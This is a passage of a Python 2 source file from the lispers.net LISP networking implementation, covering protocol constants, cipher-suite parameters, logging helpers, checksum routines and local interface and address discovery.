# Dictiionary array format is:
# key = self.local_addr + ":" + self.local_port
# lisp_rtr_nat_trace_cache[key] = (translated_rloc, translated_port)
#
# And the array elements are added in lisp_trace.rtr_cache_nat_trace().
#
lisp_rtr_nat_trace_cache = {}
#
# Configured glean mappings. The data structure is an array of dictionary
# arrays with keywords "eid-prefix", "group-prefix", "rloc-prefix", and
# "instance-id". If keywords are not in dictionary array, the value is
# wildcarded. The values eid-prefix, group-prefix and rloc-prefix is
# lisp_address() so longest match lookups can be performed. The instance-id
# value is an array of 2 elements that store same value in both elements if
# not a range or the low and high range values.
#
lisp_glean_mappings = []
#
# Use this socket for all ICMP Too-Big messages sent by any process. We are
# centralizing it here.
#
lisp_icmp_raw_socket = None
if (os.getenv("LISP_SEND_ICMP_TOO_BIG") != None):
lisp_icmp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_ICMP)
lisp_icmp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
#endif
lisp_ignore_df_bit = (os.getenv("LISP_IGNORE_DF_BIT") != None)
#------------------------------------------------------------------------------
#
# UDP ports used by LISP.
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
#
# Packet type definitions.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
#
# Map-Reply action values.
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
lisp_map_reply_action_string = ["no-action", "native-forward",
"send-map-request", "drop-action", "policy-denied", "auth-failure" ]
#
# Various HMACs alg-ids and lengths (in bytes) used by LISP.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
#
# LCAF types as defined in draft-ietf-lisp-lcaf.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
#
# TTL constant definitions.
#
LISP_MR_TTL = (24*60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_IGMP_TTL = 150
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_TEST_MR_INTERVAL = 60 # In units of seconds
LISP_MAP_NOTIFY_INTERVAL = 2 # In units of seconds
LISP_DDT_MAP_REQUEST_INTERVAL = 2 # In units of seconds
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15 # In units of seconds
LISP_MAP_REQUEST_RATE_LIMIT = 5 # In units of seconds
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1 # In units of seconds
#LISP_RLOC_PROBE_TTL = 255
LISP_RLOC_PROBE_TTL = 64
LISP_RLOC_PROBE_INTERVAL = 10 # In units of seconds
LISP_RLOC_PROBE_REPLY_WAIT = 15 # In units of seconds
#LISP_RLOC_PROBE_INTERVAL = 60 # In units of seconds
LISP_DEFAULT_DYN_EID_TIMEOUT = 15 # In units of seconds
LISP_NONCE_ECHO_INTERVAL = 10 # In units of seconds
#
# Cipher Suites defined in RFC 8061:
#
# Cipher Suite 0:
# Reserved
#
# Cipher Suite 1 (LISP_2048MODP_AES128_CBC_SHA256):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 2 (LISP_EC25519_AES128_CBC_SHA256):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 3 (LISP_2048MODP_AES128_GCM):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 4 (LISP_3072MODP_AES128_GCM):
# Diffie-Hellman Group: 3072-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 5 (LISP_256_EC25519_AES128_GCM):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 6 (LISP_256_EC25519_CHACHA20_POLY1305):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: Chacha20-Poly1305 [CHACHA-POLY] [RFC7539]
# Integrity: Integrated with AEAD_CHACHA20_POLY1305 [CHACHA-POLY]
# IV length: 8 bytes
# KDF: HMAC-SHA-256
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
#------------------------------------------------------------------------------
#
# lisp_record_traceback
#
# Open ./logs/lisp-traceback.log file and write traceback info to it.
#
def lisp_record_traceback(*args):
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
fd = open("./logs/lisp-traceback.log", "a")
fd.write("---------- Exception occurred: {} ----------\n".format(ts))
try:
traceback.print_last(file=fd)
except:
fd.write("traceback.print_last(file=fd) failed")
#endtry
try:
traceback.print_last()
except:
print("traceback.print_last() failed")
#endtry
fd.close()
return
#enddef
#
# lisp_set_exception
#
# Set exception callback to call lisp.lisp_record_traceback().
#
def lisp_set_exception():
sys.excepthook = lisp_record_traceback
return
#enddef
#
# lisp_is_raspbian
#
# Return True if this system is running Raspbian on a Raspberry Pi machine.
#
def lisp_is_raspbian():
if (platform.dist()[0] != "debian"): return(False)
return(platform.machine() in ["armv6l", "armv7l"])
#enddef
#
# lisp_is_ubuntu
#
# Return True if this system is running Ubuntu Linux.
#
def lisp_is_ubuntu():
return(platform.dist()[0] == "Ubuntu")
#enddef
#
# lisp_is_fedora
#
# Return True if this system is running Fedora Linux.
#
def lisp_is_fedora():
return(platform.dist()[0] == "fedora")
#enddef
#
# lisp_is_centos
#
# Return True if this system is running CentOS Linux.
#
def lisp_is_centos():
return(platform.dist()[0] == "centos")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian():
return(platform.dist()[0] == "debian")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian_kali():
return(platform.dist()[0] == "Kali")
#enddef
#
# lisp_is_macos
#
# Return True if this system is running MacOS operating system.
#
def lisp_is_macos():
return(platform.uname()[0] == "Darwin")
#enddef
#
# lisp_is_alpine
#
# Return True if this system is running the Apline Linux operating system.
#
def lisp_is_alpine():
return(os.path.exists("/etc/alpine-release"))
#enddef
#
# lisp_is_x86
#
# Return True if this process is an x86 little-endian machine.
#
def lisp_is_x86():
cpu = platform.machine()
return(cpu in ("x86", "i686", "x86_64"))
#enddef
#
# lisp_is_linux
#
# Return True if this is a ubuntu or fedora system.
#
def lisp_is_linux():
return(platform.uname()[0] == "Linux")
#enddef
#
# lisp_on_aws
#
# Return True if this node is running in an Amazon VM on AWS.
#
def lisp_on_aws():
vm = commands.getoutput("sudo dmidecode -s bios-version")
return(vm.lower().find("amazon") != -1)
#enddef
#
# lisp_on_gcp
#
# Return True if this node is running in an Google Compute Engine VM.
#
def lisp_on_gcp():
vm = commands.getoutput("sudo dmidecode -s bios-version")
return(vm.lower().find("google") != -1)
#enddef
#
# lisp_process_logfile
#
# Check to see if logfile exists. If not, it is startup time to create one
# or another procedure rotated the file out of the directory.
#
def lisp_process_logfile():
logfile = "./logs/lisp-{}.log".format(lisp_log_id)
if (os.path.exists(logfile)): return
sys.stdout.close()
sys.stdout = open(logfile, "a")
lisp_print_banner(bold("logfile rotation", False))
return
#enddef
#
# lisp_i_am
#
# The individual components tell the libraries who they are so we can prefix
# the component name for print() and logs().
#
def lisp_i_am(name):
global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
global lisp_hostname
lisp_log_id = name
if (name == "itr"): lisp_i_am_itr = True
if (name == "etr"): lisp_i_am_etr = True
if (name == "rtr"): lisp_i_am_rtr = True
if (name == "mr"): lisp_i_am_mr = True
if (name == "ms"): lisp_i_am_ms = True
if (name == "ddt"): lisp_i_am_ddt = True
if (name == "core"): lisp_i_am_core = True
#
# Set hostname to normalize dino-macbook.local or dino-macbook.wp.comcast.
# net to "dino-macbook".
#
lisp_hostname = socket.gethostname()
index = lisp_hostname.find(".")
if (index != -1): lisp_hostname = lisp_hostname[0:index]
return
#enddef
#
# lprint
#
# Print with timestamp and component name prefixed. If "force" is any argument,
# then we don't care about the lisp_debug_logging setting and a log message
# is issued.
#
def lprint(*args):
force = ("force" in args)
if (lisp_debug_logging == False and force == False): return
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print "{}: {}:".format(ts, lisp_log_id),
for arg in args:
if (arg == "force"): continue
print arg,
#endfor
print ""
try: sys.stdout.flush()
except: pass
return
#enddef
#
# dprint
#
# Data-plane logging. Call lprint() only if lisp.lisp_data_plane_logging is
# True.
#
def dprint(*args):
if (lisp_data_plane_logging): lprint(*args)
return
#enddef
#
# debug
#
# Used for debugging. Used to find location of temporary "printf" code so it
# can be removed for production code.
#
def debug(*args):
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print red(">>>", False),
print "{}:".format(ts),
for arg in args: print arg,
print red("<<<\n", False)
try: sys.stdout.flush()
except: pass
return
#enddef
#
# lisp_print_banner
#
# Print out startup and shutdown banner.
#
def lisp_print_banner(string):
global lisp_version, lisp_hostname
if (lisp_version == ""):
lisp_version = commands.getoutput("cat lisp-version.txt")
#endif
hn = bold(lisp_hostname, False)
lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
datetime.datetime.now(), lisp_version, hn))
return
#enddef
#
# green
#
# For printing banner.
#
def green(string, html):
if (html): return('<font color="green"><b>{}</b></font>'.format(string))
return(bold("\033[92m" + string + "\033[0m", html))
#enddef
#
# green_last_sec
#
# For printing packets in the last 1 second.
#
def green_last_sec(string):
return(green(string, True))
#enddef
#
# green_last_minute
#
# For printing packets in the last 1 minute.
#
def green_last_min(string):
return('<font color="#58D68D"><b>{}</b></font>'.format(string))
#enddef
#
# red
#
# For printing banner.
#
def red(string, html):
if (html): return('<font color="red"><b>{}</b></font>'.format(string))
return(bold("\033[91m" + string + "\033[0m", html))
#enddef
#
# blue
#
# For printing distinguished-name AFIs.
#
def blue(string, html):
if (html): return('<font color="blue"><b>{}</b></font>'.format(string))
return(bold("\033[94m" + string + "\033[0m", html))
#enddef
#
# bold
#
# For printing banner.
#
def bold(string, html):
if (html): return("<b>{}</b>".format(string))
return("\033[1m" + string + "\033[0m")
#enddef
#
# convert_font
#
# Converts from text baesd bold/color to HTML bold/color.
#
def convert_font(string):
escapes = [ ["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold] ]
right = "[0m"
for e in escapes:
left = e[0]
color = e[1]
offset = len(left)
index = string.find(left)
if (index != -1): break
#endfor
while (index != -1):
end = string[index::].find(right)
bold_string = string[index+offset:index+end]
string = string[:index] + color(bold_string, True) + \
string[index+end+offset::]
index = string.find(left)
#endwhile
#
# Call this function one more time if a color was in bold.
#
if (string.find("[1m") != -1): string = convert_font(string)
return(string)
#enddef
#
# lisp_space
#
# Put whitespace in URL encoded string.
#
def lisp_space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_button
#
# Return string of a LISP html button.
#
def lisp_button(string, url):
b = '<button style="background-color:transparent;border-radius:10px; ' + \
'type="button">'
if (url == None):
html = b + string + "</button>"
else:
a = '<a href="{}">'.format(url)
s = lisp_space(2)
html = s + a + b + string + "</button></a>" + s
#endif
return(html)
#enddef
#
# lisp_print_cour
#
# Print in HTML Courier-New font.
#
def lisp_print_cour(string):
output = '<font face="Courier New">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_print_sans
#
# Print in HTML Sans-Serif font.
#
def lisp_print_sans(string):
output = '<font face="Sans-Serif">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_span
#
# Print out string when a pointer hovers over some text.
#
def lisp_span(string, hover_string):
output = '<span title="{}">{}</span>'.format(hover_string, string)
return(output)
#enddef
#
# lisp_eid_help_hover
#
# Create hover title for any input EID form.
#
def lisp_eid_help_hover(output):
eid_help_str = \
'''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# lisp_geo_help_hover
#
# Create hover title for any input Geo or EID form.
#
def lisp_geo_help_hover(output):
eid_help_str = \
'''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# space
#
# Put whitespace in URL encoded string.
#
def space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_get_ephemeral_port
#
# Select random UDP port for use of a source port in a Map-Request and
# destination port in a Map-Reply.
#
def lisp_get_ephemeral_port():
return(random.randrange(32768, 65535))
#enddef
#
# lisp_get_data_nonce
#
# Get a 24-bit random nonce to insert in data header.
#
def lisp_get_data_nonce():
return(random.randint(0, 0xffffff))
#enddef
#
# lisp_get_control_nonce
#
# Get a 64-bit random nonce to insert in control packets.
#
def lisp_get_control_nonce():
return(random.randint(0, (2**64)-1))
#enddef
#
# lisp_hex_string
#
# Take an integer, either 16, 32, or 64 bits in width and return a hex string.
# But don't return the leading "0x". And don't return a trailing "L" if the
# integer is a negative 64-bit value (high-order bit set).
#
def lisp_hex_string(integer_value):
value = hex(integer_value)[2::]
if (value[-1] == "L"): value = value[0:-1]
return(value)
#enddef
#
# lisp_get_timestamp
#
# Use time library to get a current timestamp.
#
def lisp_get_timestamp():
return(time.time())
#enddef
#
# lisp_set_timestamp
#
# Use time library to set time into the future.
#
def lisp_set_timestamp(seconds):
return(time.time() + seconds)
#enddef
#
# lisp_print_elapsed
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_elapsed(ts):
if (ts == 0 or ts == None): return("never")
elapsed = time.time() - ts
elapsed = round(elapsed, 0)
return(str(datetime.timedelta(seconds=elapsed)))
#enddef
#
# lisp_print_future
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_future(ts):
if (ts == 0): return("never")
future = ts - time.time()
if (future < 0): return("expired")
future = round(future, 0)
return(str(datetime.timedelta(seconds=future)))
#enddef
#
# lisp_print_eid_tuple
#
# Prints in html or returns a string of the following combinations:
#
# [<iid>]<eid>/<ml>
# <eid>/<ml>
# ([<iid>]<source-eid>/ml, [<iid>]<group>/ml)
#
# This is called by most of the data structure classes as "print_eid_tuple()".
#
def lisp_print_eid_tuple(eid, group):
eid_str = eid.print_prefix()
if (group.is_null()): return(eid_str)
group_str = group.print_prefix()
iid = group.instance_id
if (eid.is_null() or eid.is_exact_match(group)):
index = group_str.find("]") + 1
return("[{}](*, {})".format(iid, group_str[index::]))
#endif
sg_str = eid.print_sg(group)
return(sg_str)
#enddef
#
# lisp_convert_6to4
#
# IPC messages will store an IPv4 address in an IPv6 "::ffff:<ipv4-addr>"
# format since we have a udp46 tunnel open. Convert it an IPv4 address.
#
def lisp_convert_6to4(addr_str):
if (addr_str.find("::ffff:") == -1): return(addr_str)
addr = addr_str.split(":")
return(addr[-1])
#enddef
#
# lisp_convert_4to6
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
# Returns a lisp_address().
#
def lisp_convert_4to6(addr_str):
addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
addr.store_address(addr_str)
return(addr)
#enddef
#
# lisp_gethostbyname
#
# Return an address if string is a name or address. If socket.gethostbyname()
# fails, try socekt.getaddrinfo(). We may be running on Alpine Linux which
# doesn't return DNS names with gethostbyname().
#
def lisp_gethostbyname(string):
ipv4 = string.split(".")
ipv6 = string.split(":")
mac = string.split("-")
if (len(ipv4) > 1):
if (ipv4[0].isdigit()): return(string)
#endif
if (len(ipv6) > 1):
try:
int(ipv6[0], 16)
return(string)
except:
pass
#endtry
#endif
#
# Make sure there are hex digits between dashes, otherwise could be a
# valid DNS name with dashes.
#
if (len(mac) == 3):
for i in range(3):
try: int(mac[i], 16)
except: break
#endfor
#endif
try:
addr = socket.gethostbyname(string)
return(addr)
except:
if (lisp_is_alpine() == False): return("")
#endtry
#
# Try different approach on Alpine.
#
try:
addr = socket.getaddrinfo(string, 0)[0]
if (addr[3] != string): return("")
addr = addr[4][0]
except:
addr = ""
#endtry
return(addr)
#enddef
#
# lisp_ip_checksum
#
# Input to this function is 20-bytes in packed form. Calculate IP header
# checksum and place in byte 10 and byte 11 of header.
#
def lisp_ip_checksum(data):
if (len(data) < 20):
lprint("IPv4 packet too short, length {}".format(len(data)))
return(data)
#endif
ip = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 40, 4):
checksum += int(ip[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
ip = data[0:10] + checksum + data[12::]
return(ip)
#enddef
#
# lisp_icmp_checksum
#
# Checksum a ICMP Destination Unreachable Too Big message. It will staticly
# checksum 36 bytes.
#
def lisp_icmp_checksum(data):
if (len(data) < 36):
lprint("ICMP packet too short, length {}".format(len(data)))
return(data)
#endif
icmp = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 36, 4):
checksum += int(icmp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 2 and 4.
#
checksum = struct.pack("H", checksum)
icmp = data[0:2] + checksum + data[4::]
return(icmp)
#enddef
#
# lisp_udp_checksum
#
# Calculate the UDP pseudo header checksum. The variable 'data' is a UDP
# packet buffer starting with the UDP header with the checksum field zeroed.
#
# What is returned is the UDP packet buffer with a non-zero/computed checksum.
#
# The UDP pseudo-header is prepended to the UDP packet buffer which the
# checksum runs over:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Source Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Destination Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Upper-Layer Packet Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | zero | Next Header |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_udp_checksum(source, dest, data):
#
# Build pseudo-header for IPv6.
#
s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
udplen = socket.htonl(len(data))
next_header = socket.htonl(LISP_UDP_PROTOCOL)
pheader = s.pack_address()
pheader += d.pack_address()
pheader += struct.pack("II", udplen, next_header)
#
# Append UDP packet to pseudo-header. Add zeros to make 4 byte aligned.
#
udp = binascii.hexlify(pheader + data)
add = len(udp) % 4
for i in range(0,add): udp += "0"
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, len(udp), 4):
checksum += int(udp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at last 2 bytes of UDP header.
#
checksum = struct.pack("H", checksum)
udp = data[0:6] + checksum + data[8::]
return(udp)
#enddef
#
# lisp_get_interface_address
#
# Based on supplied interface device, return IPv4 local interface address.
#
def lisp_get_interface_address(device):
#
# Check for illegal device name.
#
if (device not in netifaces.interfaces()): return(None)
#
# Check if there are no IPv4 addresses assigned to interface.
#
addresses = netifaces.ifaddresses(device)
if (addresses.has_key(netifaces.AF_INET) == False): return(None)
#
# Find first private address.
#
return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)
for addr in addresses[netifaces.AF_INET]:
addr_str = addr["addr"]
return_address.store_address(addr_str)
return(return_address)
#endfor
return(None)
#enddef
#
# lisp_get_input_interface
#
# Based on destination-MAC address of incoming pcap'ed packet, index into
# lisp_mymacs{} to get a interface name string (device name) for all
# interfaces that have the MAC address assigned.
#
# If dest-MAC is not us, look at source MAC to see if we are in a loopback
# situation testing application and xTR in the same system.
#
def lisp_get_input_interface(packet):
macs = lisp_format_packet(packet[0:12]).replace(" ", "")
da = macs[0:12]
sa = macs[12::]
try: my_sa = lisp_mymacs.has_key(sa)
except: my_sa = False
if (lisp_mymacs.has_key(da)): return(lisp_mymacs[da], sa, da, my_sa)
if (my_sa): return(lisp_mymacs[sa], sa, da, my_sa)
return(["?"], sa, da, my_sa)
#enddef
#
# lisp_get_local_interfaces
#
# Go populate the lisp.myinterfaces{} dictionary array. Key is device ID
# returned by the netifaces API.
#
def lisp_get_local_interfaces():
for device in netifaces.interfaces():
interface = lisp_interface(device)
interface.add_interface()
#endfor
return
#enddef
#
# lisp_get_loopback_address
#
# Get first loopback address on device lo which is not 127.0.0.1.
#
def lisp_get_loopback_address():
for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
if (addr["peer"] == "127.0.0.1"): continue
return(addr["peer"])
#endif
return(None)
#enddef
#
# lisp_is_mac_string
#
# Return True if the supplied string parameter is iin form of "xxxx-xxxx-xxxx".
# The input prefix could be "xxxx-xxxx-xxxx/48".
#
def lisp_is_mac_string(mac_str):
mac = mac_str.split("/")
if (len(mac) == 2): mac_str = mac[0]
return(len(mac_str) == 14 and mac_str.count("-") == 2)
#enddef
#
# lisp_get_local_macs
#
# Walk all interfaces, and for each ethernet interface, put the MAC address
# as a key into lisp_mymacs with a value of array of interface names.
#
def lisp_get_local_macs():
for device in netifaces.interfaces():
#
# Ignore bogus interface names that containers may create. Allow
# interfaces ones with colons, dashes and alphanumeric characters.
#
d = device.replace(":", "")
d = device.replace("-", "")
if (d.isalnum() == False): continue
#
# Need this for EOS because a "pimreg" interface will crash the call
# to netifaces.ifaddresses("pimreg").
#
try:
parms = netifaces.ifaddresses(device)
except:
continue
#endtry
if (parms.has_key(netifaces.AF_LINK) == False): continue
mac = parms[netifaces.AF_LINK][0]["addr"]
mac = mac.replace(":", "")
#
# GRE tunnels have strange MAC addresses (less than 48-bits). Ignore
# them.
#
if (len(mac) < 12): continue
if (lisp_mymacs.has_key(mac) == False): lisp_mymacs[mac] = []
lisp_mymacs[mac].append(device)
#endfor
lprint("Local MACs are: {}".format(lisp_mymacs))
return
#enddef
#
# lisp_get_local_rloc
#
# Use "ip addr show" on Linux and "ifconfig" on MacOS to get a local IPv4
# address. Get interface name from "netstat -rn" to grep for.
#
def lisp_get_local_rloc():
out = commands.getoutput("netstat -rn | egrep 'default|0.0.0.0'")
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#
# Get last item on first line of output.
#
out = out.split("\n")[0]
device = out.split()[-1]
addr = ""
macos = lisp_is_macos()
if (macos):
out = commands.getoutput("ifconfig {} | egrep 'inet '".format(device))
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
else:
cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
out = commands.getoutput(cmd)
if (out == ""):
cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
out = commands.getoutput(cmd)
#endif
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#endif
#
# Check for multi-line. And favor returning private address so NAT
# traversal is used in lig.
#
addr = ""
out = out.split("\n")
for line in out:
a = line.split()[1]
if (macos == False): a = a.split("/")[0]
address = lisp_address(LISP_AFI_IPV4, a, 32, 0)
return(address)
#endif
return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
#endif
#
# lisp_get_local_addresses
#
# Use netifaces module to get a IPv4 and IPv6 local RLOC of this system.
# Return an array of 2 elements where [0] is an IPv4 RLOC and [1] is an
# IPv6 RLOC.
#
# Stores data in lisp.lisp_myrlocs[].
#
def lisp_get_local_addresses():
global lisp_myrlocs
#
